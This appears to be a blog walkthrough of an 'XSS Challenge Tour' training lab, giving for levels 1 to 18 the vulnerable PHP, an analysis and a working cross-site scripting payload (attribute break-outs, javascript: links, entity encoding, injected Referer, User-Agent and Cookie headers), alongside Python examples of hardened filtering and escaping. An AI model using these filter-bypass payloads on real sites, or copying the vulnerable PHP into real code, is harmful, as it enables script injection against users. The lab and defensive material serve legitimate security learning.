XSS Challenge Tour (by reading the code)

XSS Challenge Tour

level 1

There is no filtering

payload:

<script>alert(1)</script>

level 2

PHP key code:

echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<input name=keyword  value="'.$str.'">

Analysis:

$str comes straight from the request. On the first line it is passed through htmlspecialchars (entity-encoded), so nothing can be done there.

The second line outputs it unfiltered inside a double-quoted attribute, so it is enough to close the input tag.

payload:

"><script>alert(1)</script>&submit=search

level 3

Key Code:

<input name=keyword  value='".htmlspecialchars($str)."'>

Analysis:

The value is entity-encoded with htmlspecialchars, so tags can't be injected. Without the ENT_QUOTES flag (the default before PHP 8.1) htmlspecialchars leaves single quotes alone, and the value sits in a single-quoted attribute, so the attribute can be closed with a single quote and a JS event handler attribute added.

payload:

'> onmouseover=alert(1) b='&submit=search

level 4

Key Code:

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);

<input name=keyword  value="'.$str3.'">

Analysis:

The angle brackets are stripped from keyword, so tags can't be injected; a JS event attribute still works after closing the value with a double quote.

payload:

aa" onmouseover=alert(1) b="

level 5

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

<input name=keyword  value="'.$str3.'">

Analysis:

The keyword is lowercased first, then "<script" and "on" are neutralised by inserting an underscore.

Use the javascript: URL scheme in the href of an <a> tag instead. After submitting, click the link to trigger it.

payload:

"><a href="javascript:alert(1)">

level 6

Key Code:

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

<input name=keyword  value="'.$str6.'">

Analysis:

Similar to level 5: script, on, src, data, href and so on are neutralised, but there is no case conversion, and str_replace is case-sensitive, so mixed case bypasses it.

payload:

"><a Href="javascript:alert(1)">
"><img Src=x Onerror=alert(1)>

level 7

Key Code:

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

<input name=keyword  value="'.$str6.'">

Analysis

The input is lowercased, and script, on, src, data, href and so on are deleted outright.

Because the deletion is done in a single pass, a word can be nested inside itself so that removing the inner copy leaves the outer one behind: for example, script can be written as scrSCRIPTipt.

payload:

"><scscriptript>alert(1)</scrscriptipt>
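The two filter weaknesses used in levels 6 and 7 are properties a reviewer can test for directly: whether the filter is case-insensitive and whether it is idempotent (applying it twice gives the same result as applying it once). The following Python block is an added example, not the challenge's code: it models the level 6 and level 7 str_replace chains, adds a constructed repeat-until-stable variant, and provides a post-condition check; the function names are assumptions made here.

```python
"""
Model the level 5-7 str_replace blacklists and check two properties a code
reviewer should look for: case handling (level 6 lowercases nothing) and
idempotence (level 7 deletes in one pass, so a nested word re-forms).
Added example; names and the fixed-point variant are constructed here.
"""

# level 6: neutralise by inserting an underscore; no lowercasing, so case-sensitive
LEVEL6_RULES = {"<script": "<scr_ipt", "on": "o_n", "src": "sr_c",
                "data": "da_ta", "href": "hr_ef"}
# level 7: lowercase, then delete the words outright
LEVEL7_WORDS = ["script", "on", "src", "data", "href"]


def level6_filter(s):
    """Port of the level 6 filter: plain, case-sensitive substring replacement."""
    for bad, neutral in LEVEL6_RULES.items():
        s = s.replace(bad, neutral)
    return s


def level7_filter(s):
    """Port of the level 7 filter: lowercase, then a single removal pass."""
    s = s.lower()
    for word in LEVEL7_WORDS:
        s = s.replace(word, "")
    return s


def level7_filter_fixpoint(s, max_rounds=20):
    """Constructed variant: repeat the removal until nothing changes, so a word
    that re-forms after one pass is removed on the next."""
    s = s.lower()
    for _ in range(max_rounds):
        again = s
        for word in LEVEL7_WORDS:
            again = again.replace(word, "")
        if again == s:
            return s
        s = again
    raise ValueError("filter did not converge")


def still_contains_blacklisted(s):
    """Post-condition check: which blacklisted words survive in the output,
    compared case-insensitively (HTML tag and attribute names are)."""
    low = s.lower()
    return [w for w in LEVEL7_WORDS if w in low]


def is_idempotent_on(flt, s):
    """A sound removal filter applied twice must equal itself applied once."""
    once = flt(s)
    return flt(once) == once


if __name__ == "__main__":
    for sample in ['"><a Href="javascript:alert(1)">', "scrscriptipt"]:
        print(repr(sample))
        print("  level 6 ->", repr(level6_filter(sample)),
              "survivors:", still_contains_blacklisted(level6_filter(sample)))
        print("  level 7 ->", repr(level7_filter(sample)),
              "idempotent:", is_idempotent_on(level7_filter, sample))
        print("  fixpoint->", repr(level7_filter_fixpoint(sample)),
              "idempotent:", is_idempotent_on(level7_filter_fixpoint, sample))
```

The fixed-point loop closes the nesting trick but keeps every other weakness of a blacklist (case, encodings, separators); the check that actually matters for a defender is the post-condition on the output, and the durable fix is context-aware output encoding rather than input deletion.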

level 8

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

 echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';

Analysis

The filter is almost the same as before, with double quotes also replaced.

As in level 5, a javascript: link can be used, but because "script" is neutralised the URL has to be written as HTML character references: str_replace does not match them, while the browser decodes them before following the link.

Encoding javascript:alert(1) gives:

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41

Tip:

Python code for the encoding (originally a method that stored the result in self.enCode['unicodeHtml']; shown here as a standalone function):

def unicode_html(org_code):
    # Encode every character as a decimal HTML character reference, joined by ';'.
    # The last reference is left without a trailing ';', which browsers still accept.
    return ';'.join('&#{}'.format(ord(x)) for x in org_code)

Takeaways

Other people online said it can be bypassed like this:

Null bytes, spaces, tabs, line breaks, comments or special functions can be used to split up the keyword so that the filter does not match it, for example:

javas%09cript:alert()

javas%0acript:alert()

javas%0dcript:alert()

%09: tab
%0a: line feed
%0d: carriage return

But when I tried it:

Hmm, it failed. I searched and found claims that it was an httpd.conf configuration issue:

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

Replace this paragraph with:

<Directory />
    Options Indexes FollowSymLinks
    AllowOverride None
</Directory>

Hmm, that changed nothing; maybe it's a problem with my environment. Leaving this as a placeholder.

level 9

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="Is your link illegal?Is there any!">Friendly Links</a></center>';
}
else
{
  echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';
}

Analysis

The usual filtering, plus the link is rejected as illegal if keyword does not contain http://. Since strpos only looks for the substring anywhere in the value, it can be appended after the encoded payload inside a JavaScript comment.

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41 //http://
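Levels 8 and 9, and the tab/line-break variants from the takeaways above, all defeat checks that look at the raw string rather than at what the browser will do with it: the browser decodes character references in the attribute value, drops ASCII tab, LF and CR from the URL, and only then parses the scheme, while a strpos for http:// accepts the substring anywhere. The following Python block is an added example, not the challenge's code; safe_href, browser_view, the two naive checks and the sample links are constructed here.

```python
"""
Decide whether a user-supplied link is safe by looking at it the way the
browser will (character references decoded, ASCII tab/LF/CR removed, scheme
parsed) instead of by substring search. Added example; all names and sample
links are constructed here.
"""
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample links. The first has the same shape as the level 8 payload:
# every character of javascript:alert(1) as a decimal character reference.
ENTITY_ENCODED = ("&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;"
                  "&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41")
TAB_SPLIT = "javas\tcript:alert(1)"   # %09 in the query string reaches $_GET as a raw tab
GOOD_LINK = "https://example.com/links?x=1"


def naive_level8_allows(href):
    """Level 8 style check: reject only if the literal word 'script' appears."""
    return "script" not in href.lower()


def naive_level9_allows(href):
    """Level 9 style check: accept as long as 'http://' appears somewhere."""
    return "http://" in href


def browser_view(href):
    """Approximate the browser's reading of an href attribute: decode character
    references (the attribute value is unescaped before URL parsing), then drop
    ASCII tab/LF/CR, which the URL Standard strips from URLs. Recent Python
    versions of urlsplit strip those too; doing it here keeps the step visible."""
    decoded = html.unescape(href)
    return "".join(ch for ch in decoded if ch not in "\t\n\r").strip()


def safe_href(href):
    """Return href unchanged if its scheme, as the browser will see it, is http
    or https; otherwise return an inert placeholder. Relative links (empty
    scheme) are rejected too, which suits an external 'friendly links' field."""
    scheme = urlsplit(browser_view(href)).scheme.lower()
    return href if scheme in ALLOWED_SCHEMES else "#"


if __name__ == "__main__":
    for link in (ENTITY_ENCODED, ENTITY_ENCODED + " //http://", TAB_SPLIT, GOOD_LINK):
        print(repr(link))
        print("  browser sees :", repr(browser_view(link)))
        print("  level 8 check:", naive_level8_allows(link),
              " level 9 check:", naive_level9_allows(link))
        print("  safe_href    :", repr(safe_href(link)))
```

The decisive design choice is the order of operations: decode and normalise first, then allow-list the scheme, and never search the raw string for forbidden words. The same ordering applies to any other sink that the browser decodes before interpreting.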

level 10

Key Code:

$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<input name="t_sort"  value="'.$str33.'" type="hidden">

Analysis

The keyword parameter is of no use, because $str is entity-encoded before it is output.

There is also a t_sort parameter, which only has its angle brackets stripped, so close the attribute and use a JS event.

However, the t_sort input is type="hidden", so the payload also sets type="text" to make it visible.

payload:

" onmouseover=alert(1) type="text" //
<!--Visit:/level10.php?keyword=well%20done!&t_sort=" onmouseover=alert(1) type="text" //-->

level 11

Key Code:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

Analysis

Both keyword and t_sort are entity-encoded, so they are of no use.

$_SERVER['HTTP_REFERER'] appears here, and only its angle brackets are stripped. So how is this value controlled?

Intercept the request and modify it:

payload:

Burp Suite is used here to modify the request.

Add a header: Referer:'onmouseover=alert(1) type='text'//

Then click Forward.

level 12

Key Code:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

<input name="t_ua"  value="'.$str33.'" type="hidden">

Analysis

Same as the previous level, again by modifying the intercepted request; this time the value comes from the User-Agent header.

payload:

Change the value of User-Agent to "onmouseover=alert(1) type="text "//

level 13

Key Code:

setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

<input name="t_cook"  value="'.$str33.'" type="hidden">

Analysis

Intercept the request and change the cookie.

payload:

Cookie: user=" onmouseover=alert(1) type="text" //

level 14

I didn't fully understand this one; there is an answer in the last reference.

level 15

Key Code:

<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script>

$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';

Analysis

From other people's write-ups, this one uses the AngularJS ng-include directive.

The ng-include directive is used to include external HTML files.

The included content becomes a child node of the specified element.

The value of the ng-include attribute can be an expression that returns a file name.

By default, the included file must be on the same domain.

When you visit /level15.php?src='level1.php', level1.php is included into this page:

So a payload from an earlier level, such as level 1, can be reused.

payload:

/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'

level 16

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("\t","&nbsp;",$str4);
echo "<center>".$str5."</center>";

Analysis

Spaces, slashes and tabs are replaced with &nbsp;, but carriage return (%0d) and line feed (%0a) are not, and the HTML parser accepts them as separators between a tag name and its attributes.

payload:

<img%0Dsrc=1%0Donerror=alert(1)>

level 17

Key Code:

echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";

Analysis

Both parameters are entity-encoded, but they are inserted into an unquoted src attribute, so a leading space followed by an event-handler attribute is enough; no quotes or angle brackets are needed.

payload:

%20onmouseover=alert(1)

Resulting HTML:

<embed src=xsf01.swf?a= onmouseover=alert(1) width=100% heigth=100%><h2 align=center>After success,<a href=level18.php?arg01=a&arg02=b>Click on me to enter the next level</a></h2>
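Levels 3, 16 and 17 are all about how the HTML tokenizer splits a tag into attributes: a single quote that htmlspecialchars left alone (level 3), a carriage return used in place of a space (level 16), and a bare space inside an unquoted attribute (level 17). The following Python block is an added example, not the challenge's code: it feeds rendered fragments through Python's html.parser to list the attributes actually seen, and pairs each weak rendering with a hardened one that always double-quotes the attribute and escapes quotes (html.escape with quote=True, the equivalent of htmlspecialchars with ENT_QUOTES). The function names and sample inputs are constructed here; the same hardened rendering applies to the hidden inputs in levels 10 to 13, whose values come from Referer, User-Agent and Cookie.

```python
"""
Verify attribute-context escaping by asking an HTML tokenizer which attributes
it sees, instead of assuming the encoding did its job. Added example; names
and sample inputs are constructed here.
"""
import html
from html.parser import HTMLParser


class _AttrCollector(HTMLParser):
    """Record (tag, {attr: value}) for every start tag in the fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def attrs_of(fragment):
    """Return the list of (tag, attrs) the tokenizer finds in `fragment`."""
    p = _AttrCollector()
    p.feed(fragment)
    p.close()
    return p.tags


def event_handlers(fragment):
    """Detection check: names of on* attributes present in `fragment`."""
    return sorted(name for _tag, attrs in attrs_of(fragment)
                  for name in attrs if name.startswith("on"))


def render_attr(value):
    """Hardened form: always double-quote and escape & < > " and '."""
    return '"' + html.escape(value, quote=True) + '"'


# Constructed inputs, shaped like the challenge's own payloads.
LEVEL3_INPUT = "' onmouseover=alert(1) b='"       # breaks out of a single-quoted attribute
LEVEL16_INPUT = "<img\rsrc=1\ronerror=alert(1)>"  # CR instead of spaces, for a text sink
LEVEL17_INPUT = " onmouseover=alert(1)"           # one space inside an unquoted attribute


def weak_level3():
    # quote=False mirrors htmlspecialchars without ENT_QUOTES: the ' survives
    return "<input name=keyword value='" + html.escape(LEVEL3_INPUT, quote=False) + "'>"


def weak_level16():
    # the level 16 filter never touches CR/LF, so the tag reaches the page intact
    return "<center>" + LEVEL16_INPUT + "</center>"


def weak_level17():
    # fully entity-encoded, yet unquoted: no metacharacter is needed for a new attribute
    return "<embed src=xsf01.swf?a=" + html.escape(LEVEL17_INPUT, quote=True) + ">"


def hardened_level3():
    return "<input name=keyword value=" + render_attr(LEVEL3_INPUT) + ">"


def hardened_level16():
    # text context: escaping < and > is what makes the CR trick irrelevant
    return "<center>" + html.escape(LEVEL16_INPUT, quote=True) + "</center>"


def hardened_level17():
    return "<embed src=" + render_attr("xsf01.swf?a=" + LEVEL17_INPUT) + ">"


if __name__ == "__main__":
    for name, render in [("weak 3", weak_level3), ("weak 16", weak_level16),
                         ("weak 17", weak_level17), ("hard 3", hardened_level3),
                         ("hard 16", hardened_level16), ("hard 17", hardened_level17)]:
        frag = render()
        print(f"{name:8} handlers={event_handlers(frag)}  attrs={attrs_of(frag)}")
```

Python's html.parser is close enough to a browser tokenizer for this purpose (it treats CR, LF and tab as attribute separators and decodes character references in attribute values), which makes it a cheap unit-test oracle for templates: render with untrusted input, parse, and assert that no attribute beyond the intended ones appears.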

level 18

Key Code:

echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";

Analysis

Same situation as level 17.

payload:

%20onmouseover=alert(1)

I couldn't solve levels 19 and 20.

Reference resources:

XSS Challenge Tour (1~10)
https://www.jianshu.com/p/550529813397

XSS Challenge Tour--Game Breakout
https://www.jianshu.com/p/4e3a517bc4ea

Dwarf on Giant's Shoulder XSS Challenge Trip - Game Solutions (Update to Level 18)
https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12

Tags: PHP encoding Javascript angular

Posted on Fri, 15 May 2020 21:04:31 -0400 by alexislalas